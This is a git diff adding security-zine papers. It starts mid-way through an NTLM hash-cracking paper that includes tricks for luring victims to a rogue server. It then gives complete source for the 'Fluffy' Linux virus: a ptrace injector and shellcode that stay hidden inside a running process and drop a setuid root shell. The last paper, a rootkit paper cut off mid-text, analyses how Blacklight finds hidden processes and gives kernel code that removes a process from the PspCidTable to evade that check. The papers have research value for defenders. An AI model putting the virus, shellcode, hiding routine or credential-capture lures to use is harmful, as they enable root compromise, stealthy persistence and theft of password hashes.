Being able to look up the first 7 bytes of the password is already a big advantage, though. The second part of the password, if the password is longer than 7 bytes at all, can now usually be guessed or brute forced with ease. Having determined that the password starts with "ILLUSTR", for example, it will most often end with "ATION" or "ATOR". Falling back to brute force for this example after looking up the first 7 bytes means brute forcing only the remaining 4-5 characters until the final password is revealed. Even off-the-shelf hardware does this in seconds. While taking a bit longer, even brute forcing 6 bytes is nothing one couldn't sit out. 7 bytes, however, requires an inconvenient amount of time. That's where being able to look that part up as well would really come in handy. Well, guess what. There is a way.

3.4) Breaking the second part of the password


As described earlier in this paper, the second part of the password, just like the first one, is used to encrypt a known string to form an 8 byte LM hash. Knowing the challenge sent from the server to the client, it is possible to deduce the final 2 bytes of that LM hash from the third chunk of the NTLM hash, as explained in section 2.2.

So the final 2 bytes of the LM hash of the second half of the original password are known. If an approach similar to the one used for breaking the first half of the password is applied now, looking up the second part of the password becomes quite possible as well.

The key here is to create a set of precomputed LanMan tables that are sorted by the final 2 bytes of the LM hash. Once the final 2 bytes of a captured LM hash are known, they identify a file that contains exactly those plaintext passwords which, when hashed, end in a matching 2 byte sequence.

The second chunk of the NTLM hash is derived from 6 bytes that form the start of the hash of one of the plaintext passwords in the file that was just identified, plus a single leading byte, which is the final byte of the first LM hash.

With the first part of the password broken, that byte is known. All that's left to do is hash every candidate password in the file, place the known byte in the first position of a string, append the first 6 bytes of the freshly computed hash, use those 7 bytes to encrypt the challenge once more, and compare the result to the second chunk of the NTLM hash. If it matches, the second part of the password has been broken too.

Even if looking up the first part of the password didn't prove successful, the method may still be applied. The only change is that up to 256 possible values for the first byte would have to be computed and tested as well.

What's really interesting to note here is that the second set of tables, the sorted LM tables, unlike the first set of NTLM tables, does NOT depend on a particular challenge. They will work with any challenge, which is usually sniffed or acquired from the wire along with the password hash and the username.

4) How to get the victim to log into the rogue server?

The big question to answer is how one can get the victim to log into the rogue server, thus exposing his username and password hash for the attacker to break.
+ +Approach 1: Sending a html mail that includes a link in the form of a +UNC path should do the trick, depending primarily on the sender's +rhetoric ability in getting his victim to click the link, and the mail +client to understand what it's expected to do. A UNC path is usually in +the form of 192.168.7.6share, where the IP address obviously specifies +the host to connect to, and ``share'' is a shared resource on that host. +Due to Microsoft always being concerned about comfort first, the +following will happen once the victim clicks the link on a Windows +machine. The OS will try to log into the specified resource. When asked +for a username and password, the client happily provides the current +user's username and his hashed password to the server in an effort to +try to log in with these credentials. No user interaction required. No +joke. + +Approach 2: Getting the victim to visit a site that includes a UNC path +with Internet Explorer has the same result. An image tag like will do +the trick. IE will make Windows try to log into the resource in order to +get the image. Again, no user interaction is required. This trick does +not work with Mozilla Firefox by the way. + +Approach 3: If the rogue server is part of the LAN, advertising it in +the network neighbourhood as "warez, porn, mp3, movie" - server should +result in users trying to log into it sooner or later. There's no way +anyone can withstand the power of the 4 elements! + +There's plenty of other ways that the author leaves to the readers +imagination. + +5) Things to remember + + +Once a hash has been received and successfully broken, it may still not +be the correct password, and accordingly not allow the attacker to log +into his victims machine. That's due to the password being hashed all +uppercase for LM, while the MD4 based second hash actually is case +sensitive. So a hash that's been deciphered as being "WELCOME" may +originally have been "Welcome" or "welcome" or even "wELCOME" or +"WeLcOme" or .. well, you get the idea. Then again, how many users +actually apply uncommon spelling schemes? + +6) Covering it up + + +Having read this paper the reader should by now realize that NTLM, +an authentication mechanism that probably most computers on this +planet support, is actually a big threat to hosts and entire +networks. Especially with the recently discovered remote Windows +exploits that require valid accounts on the victim machines for the +attacker to log into first, a worm that makes people visit a +website, which in turn makes them log into a rogue server that +breaks the hash and automatically exploits the victim is a +frightening threat scenario. + + +Bibliography + +Windows NT rantings from the L0pht +http://www.packetstormsecurity.org/Crackers/NT/l0phtcrack/l0phtcrack.rant.nt.passwd.txt + +Making a Faster Cryptanalytic Time-Memory Trade-Off +http://lasecwww.epfl.ch/ oechslin/publications/crypto03.pdf diff --git a/uninformed/3.5.txt b/uninformed/3.5.txt new file mode 100644 index 0000000..f42e44b --- /dev/null +++ b/uninformed/3.5.txt @@ -0,0 +1,561 @@ +Linux Improvised Userland Scheduler Virus +Izik +izik@tty64.org +Last modified: 12/29/2005 + +1) Introduction + +This paper discusses the combination of a userland scheduler and +runtime process infection for a virus. These two concepts complete +each other. The runtime process infection opens the door to invading +into other processes, and the userland scheduler provides a way to +make the injected code coexist with the original process code. 
This +allows the virus to remain stealthy and active inside an infected +process. + + +2) Scheduler, Who? + +A scheduler, in particular a process scheduler is a kernel component +that selects which process to run next. The scheduler is the basis +of a multitasking operating system such as Linux. By deciding what +process can run, the scheduler is responsible for utilizing the +system the best way and giving the impression that multiple +processes are simultaneously executing. A good example of using the +scheduler in a virus, is when the fork() syscall is used to +spawn a child process for the virus to run in. But fork() +puts the child process out, thus it appears in the system process +list and could attract attention. + + +3) Userland Scheduler + +An userland scheduler, as opposed to the kernel scheduler, runs +inside an application scope and deals with the application threads +and processes. The userland scheduler is still subject to the kernel +scheduler and meant to improve the application multi-threads +management. One of the major tasks that the scheduler performs is +context switching. Taking airtime from one thread to another. +Improvising a userland scheduler inside an infected process will +give the option of switching from the original process to the virus +and back, without attracting too much attention on the way. + + +4) Improvising a Userland Scheduler + +An application that does implement a userland scheduler in it, +provides the functions and support to do so in the code. This is a +privilege that a virus could not easily implement smoothly. So +improvising takes places. This raises two major problems: how and +when. How to perform the context switching task within a code that +has no previous support, and when the userland scheduler code can +run to begin supervising this in the first place. + +There are a few ways to do it. For example putting a hook on a +function is one way. Once the program will call the function that +has been hooked, the virus will activate and afterwards return control +to the program. But it's not an ideal solution as there is no +guarantee that the program will continue using it, and for how often +or long. In order to get a wider scope that could cover the entire +program, signals could be used. + +Looking at the signal mechanism in Linux, it's similar to the +interrupts mechanism, in the way that that the kernel allows a +program to process a signal within any place in the program code +without any special preparation and resume back to the program flow +once the signal handler function is done. It gives a very good way +to perform context switching with little effort. This answers the +"how" question, in how to perform the context switching task, using +the signal handler function as the base function of the virus which +will be invoked while the SIGALRM signal will be processed. + +Adopting the signal model to our needs is supported by the +alarm() syscall. The alarm() syscall allows the +process to schedule the alarm signal (SIGALRM) to be +delivered, thus making it kernel responsibility. Having the kernel +constantly delivering a signal to the process hosting the virus, +saves the virus the effort of doing it. This answers the when +question for when the userland scheduler code would run. Using the +alarm() syscall to schedule a SIGALRM to be +delivered to the process, that in turn will call the virus function. 
+This code demonstrates the functionality of alarm() and +SIGALRM: + +/* +* sigalrm-poc.c, SIGALRM Proof of Concept +*/ + +#include +#include +#include +#include + +// SIGALRM Handler + +void shapebreaker(int ignored) { + + // Break the cycle + + printf("\nX\n"); + + // Schedule another one + + alarm(5); + + return ; +} + +int main(int argc, char **argv) { + + int shape_selector = 0; + char shape; + + // Register for SIGALRM + + if (signal(SIGALRM, shapebreaker) < 0) { + perror("signal"); + return -1; + } + + // Schedule SIGALRM for 5 secs + + alarm(5); + + while(1) { + // Shape selector + + switch (shape_selector % 2) { + + case 0: + shape = '.'; + break; + + case 1: + shape = 'o'; + break; + + case 2: + shape = 'O'; + break; + } + + // Print given shape + + printf("%c\r", shape); + + // Incerase shape index + + shape_selector++; + + } + + // NEVER REACHED + + return 1; +} + +The program concept is pretty simple, it prints a char from a loop, +selecting the char via an index variable. Every five seconds or so, +a SIGALRM is being scheduled to be delivered using the +alarm() syscall. Once the signal has been processed the +signal handler, which is the shapebreaker() function in +this case, is being called and is breaking the char sequence. +Afterwards the program continues as if nothing happened. From within +the signal handler function, a virus can operate and once it +returns, the program will continue flawlessly. + + +5) Runtime Process Infection + +Runtime infection is done using the notorious ptrace() +syscall, which allows a process to attach to another process, +assuming of course, that it has root privileges or has a +father-child relationship with some exceptions to it. Once the +attached process gets into debugging mode, it is possible to modify +its registers and write/read from its address space. These are +features that are required to slip in the virus code and activate +it. For an in-depth review of the ptrace() injection +method, refer to the "Building ptrace Injecting Shellcodes" article +in Phrack 59[1]. + +5.1) The Algorithm + +Having the motives, tools and knowledge, here's the plan: + +Infector: +--------- + +* Attach to process +> Wait for process to stop + > Query process registers + > Calculate previous stack page beginning + > Store current EIP + > Inject pre-virus and virus code + > Set EIP to pre-virus code + > Deattach from process + +Pre-Virus: +---------- + + * Register SIGALRM signal +> Schedule SIGALRM (14secs) +> Give control back to process + +Virus: +------ + +* SIGALRM handler invoked +> Check for /tmp/fluffy + > Create fluffy.c + > Compile fluffy.c + > Remove /tmp/fluffy.c + > Chmod /tmp/fluffy +> Jmp to pre-virus code + +The infecting process is divided into two steps, the infector +injects the virus and the pre-virus code to the infected process. +Afterward it sets the process EIP to point to the pre-virus +code. This independently registers to the SIGALRM signal +within the infected process and calculates the virus location for +the signal callback function. Then it schedules a SIGALRM +signal and passes the control back to the process. Once the signal +caught the virus it kicks in as the signal handler. 
+ + +5.2) Meet Fluffy + +A code that implements the above theory: + +/* +* x86-fluffy-virus.c, Fluffy virus / izik@tty64.org +*/ + +#include +#include +#include +#include +#include +#include +#include + +char virus_shcode[] = + +// <_start>: + + "\x90" // nop + "\x90" // nop + "\x60" // pusha + "\x9c" // pushf + "\x31\xc0" // xor %eax,%eax + "\x31\xdb" // xor %ebx,%ebx + "\xb0\x30" // mov $0x30,%al + "\xb3\x0e" // mov $0xe,%bl + "\xeb\x06" // jmp <_geteip> + +// <_calc_eip>: + + "\x59" // pop %ecx + "\x83\xc1\x0d" // add $0xd,%ecx + "\xeb\x05" // jmp <_continue> + +// <_geteip>: + + "\xe8\xf5\xff\xff\xff" // call <_calc_eip> + +// <_continue>: + + "\xcd\x80" // int $0x80 + "\x85\xc0" // test %eax,%eax + "\x75\x04" // jne <_resumeflow> + "\xb0\x1b" // mov $0x1b,%al + "\xcd\x80" // int $0x80 + +// <_resumeflow>: + + "\x9d" // popf + "\x61" // popa + "\xc3" // ret + +// <_virus>: + + "\x55" // push %ebp + "\x89\xe5" // mov %esp,%ebp + "\x31\xc0" // xor %eax,%eax + "\x31\xc9" // xor %ecx,%ecx + "\xeb\x57" // jmp <_data_jmp> + +// <_chkforfluffy>: + + "\x5e" // pop %esi + +// <_fixnulls>: + + "\x3a\x46\x07" // cmp 0x7(%esi),%al + "\x74\x0b" // je <_access> + "\xfe\x46\x07" // incb 0x7(%esi) + "\xfe\x46\x0a" // incb 0xa(%esi) + "\xb0\xb3" // mov $0xb3,%al + "\xfe\x04\x06" // incb (%esi,%eax,1) + +// <_access>: + + "\xb0\xa8" // mov $0xa8,%al + "\x8d\x1c\x06" // lea (%esi,%eax,1),%ebx + "\xb0\x21" // mov $0x21,%al + "\xb1\x04" // mov $0x4,%cl + "\xcd\x80" // int $0x80 + "\x85\xc0" // test %eax,%eax + "\x74\x31" // je <_schedule> + +// <_fork>: + + "\x01\xc8" // add %ecx,%eax + "\xcd\x80" // int $0x80 + "\x85\xc0" // test %eax,%eax + "\x75\x1f" // jne <_waitpid> + +// <_exec>: + + "\x31\xd2" // xor %edx,%edx + "\xb0\x17" // mov $0x17,%al + "\x31\xdb" // xor %ebx,%ebx + "\xcd\x80" // int $0x80 + "\xb0\x0b" // mov $0xb,%al + "\x89\xf3" // mov %esi,%ebx + "\x52" // push %edx + "\x8d\x7e\x0b" // lea 0xb(%esi),%edi + "\x57" // push %edi + "\x8d\x7e\x08" // lea 0x8(%esi),%edi + "\x57" // push %edi + "\x56" // push %esi + "\x89\xe1" // mov %esp,%ecx + "\xcd\x80" // int $0x80 + "\x31\xc0" // xor %eax,%eax + "\x40" // inc %eax + "\xcd\x80" // int $0x80 + +// <_waitpid>: + + "\x89\xc3" // mov %eax,%ebx + "\x31\xc0" // xor %eax,%eax + "\x31\xc9" // xor %ecx,%ecx + "\xb0\x07" // mov $0x7,%al + "\xcd\x80" // int $0x80 + +// <_schedule>: + + "\xc9" // leave + "\xe9\x7c\xff\xff\xff" // jmp <_start> + +// <_data_jmp>: + + "\xe8\xa4\xff\xff\xff" // call <_chkforfluffy> + +// +// /bin/sh\xff-c\xff +// echo "int main() { setreuid(0, 0); system(\"/bin/bash\"); return 1; }" > /tmp/fluffy.c ; +// cc -o /tmp/fluffy /tmp/fluffy.c ; +// rm -rf /tmp/fluffy.c ; +// chmod 4755 /tmp/fluffy\xff +// + +// <_data_sct>: + + "\x2f\x62\x69\x6e\x2f\x73\x68\xff\x2d\x63\xff\x65\x63\x68\x6f\x20" + "\x22\x69\x6e\x74\x20\x6d\x61\x69\x6e\x28\x29\x20\x7b\x20\x73\x65" + "\x74\x72\x65\x75\x69\x64\x28\x30\x2c\x20\x30\x29\x3b\x20\x73\x79" + "\x73\x74\x65\x6d\x28\x5c\x22\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68" + "\x5c\x22\x29\x3b\x20\x72\x65\x74\x75\x72\x6e\x20\x31\x3b\x20\x7d" + "\x22\x20\x3e\x20\x2f\x74\x6d\x70\x2f\x66\x6c\x75\x66\x66\x79\x2e" + "\x63\x20\x3b\x20\x63\x63\x20\x2d\x6f\x20\x2f\x74\x6d\x70\x2f\x66" + "\x6c\x75\x66\x66\x79\x20\x2f\x74\x6d\x70\x2f\x66\x6c\x75\x66\x66" + "\x79\x2e\x63\x20\x3b\x20\x72\x6d\x20\x2d\x72\x66\x20\x2f\x74\x6d" + "\x70\x2f\x66\x6c\x75\x66\x66\x79\x2e\x63\x20\x3b\x20\x63\x68\x6d" + "\x6f\x64\x20\x34\x37\x35\x35\x20\x2f\x74\x6d\x70\x2f\x66\x6c\x75" + "\x66\x66\x79\xff"; + +int ptrace_inject(pid_t, long, void *, 
int); + +int main(int argc, char **argv) { + + pid_t pid; + struct user_regs_struct regs; + long infproc_addr; + + if (argc < 2) { + printf("usage: %s \n", argv[0]); + return -1; + } + + pid = atoi(argv[1]); + + // Attach to the process + + if (ptrace(PTRACE_ATTACH, pid, NULL, NULL) < 0) { + perror(argv[1]); + return -1; + } + + // Wait for a process to stop + + if (waitpid(pid, NULL, 0) < 0) { + perror(argv[1]); + ptrace(PTRACE_DETACH, pid, NULL, NULL); + return -1; + } + + // Query process registers + + if (ptrace(PTRACE_GETREGS, pid, ®s, ®s) < 0) { + perror("Oopsie"); + ptrace(PTRACE_DETACH, pid, NULL, NULL); + return -1; + } + + printf("Original ESP: 0x%.8lx\n", regs.esp); + printf("Original EIP: 0x%.8lx\n", regs.eip); + + // Push original EIP on stack for virus to RET + + regs.esp -= 4; + + ptrace(PTRACE_POKETEXT, pid, regs.esp, regs.eip); + + // Calculate the previous stack page top address + + infproc_addr = (regs.esp & 0xFFFFF000) - 0x1000; + + printf("Injection Base: 0x%.8lx\n", infproc_addr); + + // Inject virus code + + if (ptrace_inject(pid, infproc_addr, virus_shcode, sizeof(virus_shcode) - 1) < 0) { + return -1; + } + + // Change EIP to point over virus shcode + + regs.eip = infproc_addr + 2; + + printf("Current EIP: 0x%.8lx\n", regs.eip); + + // Set process registers (EIP changed) + + if (ptrace(PTRACE_SETREGS, pid, ®s, ®s) < 0) { + perror("Oopsie"); + ptrace(PTRACE_DETACH, pid, NULL, NULL); + return -1; + } + + // It's fluffy time! + + if (ptrace(PTRACE_DETACH, pid, NULL, NULL) < 0) { + perror("Oopsie"); + return -1; + } + + printf("pid #%d got infected!\n", pid); + + return 1; +} + +// Injection Function + +int ptrace_inject(pid_t pid, long memaddr, void *buf, int buflen) { + + long data; + + while (buflen > 0) { + memcpy(&data, buf, 4); + + if ( ptrace(PTRACE_POKETEXT, pid, memaddr, data) < 0 ) { + perror("Oopsie!"); + ptrace(PTRACE_DETACH, pid, NULL, NULL); + + return -1; + } + + memaddr += 4; + buf += 4; + buflen -= 4; + } + + return 1; +} + +A few pointers about the code: + +The virus assembly parts were written as one chunk, the pre-virus +code is located in the top and the virus code in the bottom. It is +also written in shellcode programming style, which produces a NULL +free and somewhat optimized code. As this chunk has been injected +into the infected process, it keeps the virus as small as possible, +which always is a good idea. + +The virus code assumes it will run more than once inside a given +infected process. This means that self modifying code actions such +as fixing NULLs in runtime, first checks if it is needed in the +current virus iteration. + +The virus itself is programmed to drop a suid shell called +/tmp/fluffy. Before doing so, it will check if the file +exists, and if that is not the case, it will execve() a +small hardcoded shell script to generate a suid wrapper. Iteration +occurs every 14 secs. + +The signal() syscall has a habit of restarting the signal handler to +default after it has been called. This means the virus has to +re-register to the signal every time. An alternative solution is to +setup the signal handler using other signal related syscalls such as +sigaction() or rtsigaction() which is how the libc signal() function +is implemented. Choosing signal() over these syscalls was based on +size related issues. + + +5.3) Further Design Issues + +Aside of what concerns the code itself: + +Injecting to the previous stack page top address is a safety move to +assure the virus code won't overwrite any program related data on +the stack. 
+
+
+5.3) Further Design Issues
+
+Aside from what concerns the code itself:
+
+Injecting at the top address of the previous stack page is a safety
+move to ensure the virus code won't overwrite any program-related
+data on the stack. Testing the virus on the syslogd daemon showed
+that this makes sense, as syslogd at some point managed to partly
+overwrite the virus code. A common pitfall is NULL bytes: an
+overwrite of two NULLs (i.e. \x00\x00) forms the valid assembly
+instruction add %al,(%eax), which easily leads to a crash.
+
+Apart from the stack, it is possible to inject the code into the
+.text section itself. On x86/IA-32, pages are 4k aligned and the
+program code itself might not fill up the entire page. The gap this
+creates is often referred to as a "cave", and it is an ideal place
+to park the virus, assuming of course that the virus is small enough
+to fit into it. But due to the nature of the .text section, which is
+not writable, the virus would be required to issue mprotect() on the
+current page in order to perform self-modifying actions on itself.
+
+An easy way to find a suitable process to infect in an automated
+fashion would be to start an attachment loop from pid zero and work
+upward. As the system boots and enters init 3 (i.e. multiuser), a
+series of daemons is launched. Due to the timing of these daemons,
+their pids will be close to zero; examples include crond, syslogd
+and inetd.
+
+
+6) Conclusion
+
+Implementing a userland scheduler allows external code to run in
+perfect harmony with the existing code. Taking an exploit scenario
+of any kind and adding this feature to it can turn a normal,
+straightforward shellcode into a backdoor and more.
+
+
+References:
+
+[1] Building ptrace Injecting Shellcodes
+anonymous
+http://www.phrack.org/show.php?p=59&a=12;
+accessed December 29, 2005.
+
+
diff --git a/uninformed/3.6.txt b/uninformed/3.6.txt
new file mode 100644
index 0000000..e596364
--- /dev/null
+++ b/uninformed/3.6.txt
@@ -0,0 +1,379 @@
+FUTo
+Peter Silberman & C.H.A.O.S.
+
+
+1) Foreword
+
+Abstract:
+
+Since the introduction of FU, the rootkit world has moved away from
+implementing system hooks to hide their presence. Because of this change
+in offense, a new defense had to be developed. The new algorithms used
+by rootkit detectors, such as BlackLight, attempt to find what the
+rootkit is hiding instead of simply detecting the presence of the
+rootkit's hooks. This paper will discuss an algorithm that is used by
+both Blacklight and IceSword to detect hidden processes. This paper will
+also document current weaknesses in the rootkit detection field and
+introduce a more complete stealth technique implemented as a prototype
+in FUTo.
+
+Thanks:
+
+Peter would like to thank bugcheck, skape, thief, pedram, F-Secure for
+doing great research, and all the nologin/research'ers who encourage
+mind growth.
+
+C.H.A.O.S. would like to thank Amy, Santa (this work was three hours on
+Christmas day), lonerancher, Pedram, valerino, and HBG Unit.
+
+
+2) Introduction
+
+In the past year or two, there have been several major developments in
+the rootkit world. Recent milestones include the introduction of the FU
+rootkit, which uses Direct Kernel Object Manipulation (DKOM); the
+introduction of VICE, one of the first rootkit detection programs; the
+birth of Sysinternals' Rootkit Revealer and F-Secure's Blacklight, the
+first mainstream Windows rootkit detection tools; and most recently the
+introduction of Shadow Walker, a rootkit that hooks the memory manager
+to hide in plain sight.
+
+Enter Blacklight and IceSword. The authors chose to investigate the
+algorithms used by both Blacklight and IceSword because they are
+considered by many in the field to be the best detection tools.
+
+Blacklight, developed by the Finnish security company F-Secure, is
+primarily concerned with detecting hidden processes. It does not attempt
+to detect system hooks; it is only concerned with hidden processes.
+IceSword uses a very similar method to Blacklight. IceSword
+differentiates itself from Blacklight in that it is a more robust tool,
+allowing the user to see what system calls are hooked, what drivers are
+hidden, and what TCP/UDP ports are open that programs, such as netstat,
+do not show.
+
+
+3) Blacklight
+
+This paper will focus primarily on Blacklight due to its algorithm being
+the research focus for this paper. Also, it became apparent after
+researching Blacklight that IceSword used a very similar algorithm.
+Therefore, if a weakness was found in Blacklight, it would most likely
+exist in IceSword as well.
+
+Blacklight takes a userland approach to detecting processes. Although
+simplistic, its algorithm is amazingly effective. Blacklight uses some
+very strong anti-debugging features that begin by creating a Thread
+Local Storage (TLS) callback table. Blacklight's TLS callback attempts
+to befuddle debuggers by forking the main process before the process
+object is fully created. This can occur because the TLS callback routine
+is called before the process is completely initialized. Blacklight also
+has anti-debugging measures that detect the presence of debuggers
+attaching to it. Rather than attempting to beat the anti-debugging
+measures by circumventing the TLS callback and making other program
+modifications, the authors decided to just disable the TLS routine. To
+do this, the authors used a tool called LordPE. LordPE allows users to
+edit PE files. The authors used this tool to zero out the TLS callback
+table. This disabled the forking routine and gave the authors the
+ability to use an API monitor. It should be noted that disabling the
+callback routine would allow you to attach a debugger, but when the user
+clicked "scan" in the Blacklight GUI, Blacklight would detect the
+debugger and exit. Instead of working up a second measure to circumvent
+the anti-debugging routines, the authors decided to analyze the calls
+occurring within Blacklight. To this end, the authors used Rohitab's API
+Monitor.
+
+In testing, one can see failed calls to the OpenProcess API ("tls zero"
+being the copy of Blacklight with its TLS table zeroed out). Blacklight
+tries opening a process with process id (PID) of 0x1CC, 0x1D0, 0x1D4,
+0x1D8 and so on. The authors dubbed this method PID Bruteforce (PIDB).
+Blacklight loops through all possible PIDs, calling OpenProcess on the
+PIDs in the range of 0x0 to 0x4E1C. Blacklight keeps a list of all
+processes it is able to open using the PIDB method. Blacklight then
+calls CreateToolhelp32Snapshot, which gives Blacklight a second list of
+processes. Blacklight then compares the two lists to see if there are
+any processes in the PIDB list that are not in the list returned by the
+CreateToolhelp32Snapshot function. If there is any discrepancy, these
+processes are considered hidden and reported to the user.
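+
+To illustrate the comparison described above, below is a simplified
+user-mode sketch of the PIDB technique (written for this discussion,
+not Blacklight's actual code); the file and function names are
+invented, and a real scanner would need to be considerably more
+careful about processes exiting mid-scan:
+
+/*
+ * pidb-sketch.c - open every possible PID and flag any process that is
+ * openable but missing from a Toolhelp snapshot.
+ */
+#include <windows.h>
+#include <tlhelp32.h>
+#include <stdio.h>
+
+/* Returns TRUE if the given PID shows up in a Toolhelp snapshot. */
+static BOOL InSnapshot(DWORD pid)
+{
+    HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
+    PROCESSENTRY32 pe = { sizeof(pe) };
+    BOOL found = FALSE;
+
+    if (snap == INVALID_HANDLE_VALUE)
+        return FALSE;
+
+    if (Process32First(snap, &pe)) {
+        do {
+            if (pe.th32ProcessID == pid)
+                found = TRUE;
+        } while (!found && Process32Next(snap, &pe));
+    }
+
+    CloseHandle(snap);
+    return found;
+}
+
+int main(void)
+{
+    DWORD pid;
+
+    /* PIDs are multiples of four; 0x4E1C mirrors the upper bound noted above. */
+    for (pid = 4; pid <= 0x4E1C; pid += 4) {
+        HANDLE h = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid);
+
+        if (h == NULL)
+            continue;
+
+        /* Openable via brute force but absent from the snapshot: hidden. */
+        if (!InSnapshot(pid))
+            printf("possible hidden process: pid 0x%lx\n", pid);
+
+        CloseHandle(h);
+    }
+
+    return 0;
+}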
+
+
+3.1) Windows OpenProcess
+
+In Windows, the OpenProcess function is a wrapper around the NtOpenProcess
+routine. NtOpenProcess is implemented in the kernel by NTOSKRNL.EXE. The
+function prototype for NtOpenProcess is:
+
+NTSTATUS NtOpenProcess (
+    OUT PHANDLE ProcessHandle,
+    IN ACCESS_MASK DesiredAccess,
+    IN POBJECT_ATTRIBUTES ObjectAttributes,
+    IN PCLIENT_ID ClientId OPTIONAL);
+
+The ClientId parameter is the actual PID that is passed by OpenProcess.
+This parameter is optional, but during our observation the OpenProcess
+function always specified a ClientId when calling NtOpenProcess.
+
+NtOpenProcess performs three primary functions:
+
+   1. It verifies the process exists by calling PsLookupProcessByProcessId.
+   2. It attempts to open a handle to the process by calling
+      ObOpenObjectByPointer.
+   3. If it was successful opening a handle to the process, it passes the
+      handle back to the caller.
+
+PsLookupProcessByProcessId was the next obvious place for research. One
+of the outstanding questions was: how does PsLookupProcessByProcessId
+know that a given PID is part of a valid process? The answer becomes
+clear in the first few lines of the disassembly:
+
+PsLookupProcessByProcessId:
+    mov edi, edi
+    push ebp
+    mov ebp, esp
+    push ebx
+    push esi
+    mov eax, large fs:124h
+    push [ebp+arg_4]
+    mov esi, eax
+    dec dword ptr [esi+0D4h]
+    push PspCidTable
+    call ExMapHandleToPointer
+
+From the above disassembly, it is clear that ExMapHandleToPointer
+queries the PspCidTable for the process ID.
+
+Now we have a complete picture of how Blacklight detects hidden processes:
+
+   1. Blacklight starts looping through the range of valid process IDs, 0
+      through 0x41DC.
+   2. Blacklight calls OpenProcess on every possible PID.
+   3. OpenProcess calls NtOpenProcess.
+   4. NtOpenProcess calls PsLookupProcessByProcessId to verify the
+      process exists.
+   5. PsLookupProcessByProcessId uses the PspCidTable to verify the
+      process exists.
+   6. NtOpenProcess calls ObOpenObjectByPointer to get the handle to the
+      process.
+   7. If OpenProcess was successful, Blacklight stores the information
+      about the process and continues to loop.
+   8. Once the process list has been created by exhausting all possible
+      PIDs, Blacklight compares the PIDB list with the list it creates by
+      calling CreateToolhelp32Snapshot. CreateToolhelp32Snapshot is a Win32
+      API that takes a snapshot of all running processes on the system. A
+      discrepancy between the two lists implies that there is a hidden
+      process. This case is reported by Blacklight.
+
+
+3.2) The PspCidTable
+
+The PspCidTable is a "handle table for process and thread client IDs".
+Every process' PID corresponds to its location in the PspCidTable. The
+PspCidTable is a pointer to a HANDLE_TABLE structure.
+
+typedef struct _HANDLE_TABLE {
+    PVOID p_hTable;
+    PEPROCESS QuotaProcess;
+    PVOID UniqueProcessId;
+    EX_PUSH_LOCK HandleTableLock [4];
+    LIST_ENTRY HandleTableList;
+    EX_PUSH_LOCK HandleContentionEvent;
+    PHANDLE_TRACE_DEBUG_INFO DebugInfo;
+    DWORD ExtraInfoPages;
+    DWORD FirstFree;
+    DWORD LastFree;
+    DWORD NextHandleNeedingPool;
+    DWORD HandleCount;
+    DWORD Flags;
+};
+
+Windows offers a variety of non-exported functions to manipulate and
+retrieve information from the PspCidTable. These include:
+
+   - [ExCreateHandleTable] creates non-process handle tables. The
+     objects within all handle tables except the PspCidTable are pointers
+     to object headers and not the address of the objects themselves.
+   - [ExDupHandleTable] is called when spawning a process.
+   - [ExSweepHandleTable] is used for process rundown.
+   - [ExDestroyHandleTable] is called when a process is exiting.
+   - [ExCreateHandle] creates new handle table entries.
+   - [ExChangeHandle] is used to change the access mask on a handle.
+   - [ExDestroyHandle] implements the functionality of CloseHandle.
+   - [ExMapHandleToPointer] returns the address of the object
+     corresponding to the handle.
+   - [ExReferenceHandleDebugInfo] is used for tracing handles.
+   - [ExSnapShotHandleTables] is used for handle searchers (for example
+     in oh.exe).
+
+Below is code that uses non-exported functions to remove a process
+object from the PspCidTable. It uses hardcoded addresses for the
+non-exported functions necessary; however, a rootkit could find these
+function addresses dynamically.
+
+typedef PHANDLE_TABLE_ENTRY (*ExMapHandleToPointerFUNC)
+    ( IN PHANDLE_TABLE HandleTable,
+      IN HANDLE ProcessId);
+
+void HideFromBlacklight(DWORD eproc)
+{
+    PHANDLE_TABLE_ENTRY CidEntry;
+    ExMapHandleToPointerFUNC map;
+
+    // Hardcoded address of ExMapHandleToPointer (system-specific)
+    map = (ExMapHandleToPointerFUNC)0x80493285;
+
+    // Look up the handle table entry for the process' PID; PIDOFFSET is
+    // the offset of the PID field within the EPROCESS structure, and the
+    // second hardcoded address is the PspCidTable itself
+    CidEntry = map((PHANDLE_TABLE)0x8188d7c8,
+                   LongToHandle( *((DWORD*)(eproc+PIDOFFSET)) ) );
+    if(CidEntry != NULL)
+    {
+        CidEntry->Object = 0;
+    }
+    return;
+}
+
+Since the job of the PspCidTable is to keep track of all the processes
+and threads, it is logical that a rootkit detector could use the
+PspCidTable to find hidden processes. However, relying on a single data
+structure is not a very robust algorithm. If a rootkit alters this one
+data structure, the operating system and other programs will have no
+idea that the hidden process exists. New rootkit detection algorithms
+should be devised that have overlapping dependencies so that a single
+change will not go undetected.
+
+
+4) FUTo
+
+To demonstrate the weaknesses in the algorithms currently used by
+rootkit detection software such as Blacklight and IceSword, the authors
+have created FUTo. FUTo is a new version of the FU rootkit. FUTo has
+the added ability to manipulate the PspCidTable without using any
+function calls. It uses DKOM techniques to hide particular objects
+within the PspCidTable.
+
+There were some design considerations when implementing the new features
+in FUTo. The first was that, like the ExMapHandleXXX functions, the
+PspCidTable is not exported by the kernel. In order to overcome this,
+FUTo automatically detects the PspCidTable by finding the
+PsLookupProcessByProcessId function and disassembling it, looking for the
+first function call. At the time of this writing, the first function
+call is always to ExMapHandleToPointer. ExMapHandleToPointer takes the
+PspCidTable as its first parameter. Using this knowledge, it is fairly
+straightforward to find the PspCidTable.
+
+PsLookupProcessByProcessId:
+    mov edi, edi
+    push ebp
+    mov ebp, esp
+    push ebx
+    push esi
+    mov eax, large fs:124h
+    push [ebp+arg_4]
+    mov esi, eax
+    dec dword ptr [esi+0D4h]
+    push PspCidTable
+    call ExMapHandleToPointer
+
+A more robust method of finding the PspCidTable may be needed, as this
+algorithm will fail if even simple compiler optimizations are made to
+the kernel. Opc0de wrote a more robust method to detect non-exported
+variables like PspCidTable, PspActiveProcessHead, PspLoadedModuleList,
+etc. Opc0de's method does not require memory scanning like the method
+currently used in FUTo. Instead, Opc0de found that the KdVersionBlock
+field in the Processor Control Region (KPCR) structure points to a
+structure, KDDEBUGGER_DATA32. The structure looks like this:
+
+typedef struct _KDDEBUGGER_DATA32 {
+
+    DBGKD_DEBUG_DATA_HEADER32 Header;
+    ULONG KernBase;
+    ULONG BreakpointWithStatus; // address of breakpoint
+    ULONG SavedContext;
+    USHORT ThCallbackStack; // offset in thread data
